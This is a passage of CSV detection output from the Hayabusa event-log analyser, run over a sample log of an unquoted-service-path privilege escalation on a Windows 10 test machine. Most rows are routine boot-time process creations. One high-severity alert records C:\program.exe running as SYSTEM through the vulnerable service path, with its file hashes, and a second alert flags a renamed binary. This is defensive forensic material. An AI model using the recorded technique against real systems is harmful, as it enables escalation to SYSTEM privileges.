winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 
747F3D96-B764-5EA4-0000-0010A5D20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 
747F3D96-B765-5EA4-0000-00109FE80000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | 
PGUID: 747F3D96-B765-5EA4-0000-001055010100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 
747F3D96-B765-5EA4-0000-00102B0F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 
747F3D96-B765-5EA4-0000-001031250100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 
0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 
747F3D96-B765-5EA4-0000-001016620100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 
747F3D96-B766-5EA4-0000-001046700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 
747F3D96-B766-5EA4-0000-0010A7800100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed 
Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 
747F3D96-B767-5EA4-0000-0010FE2E0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 
747F3D96-B769-5EA4-0000-00101D9C0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe 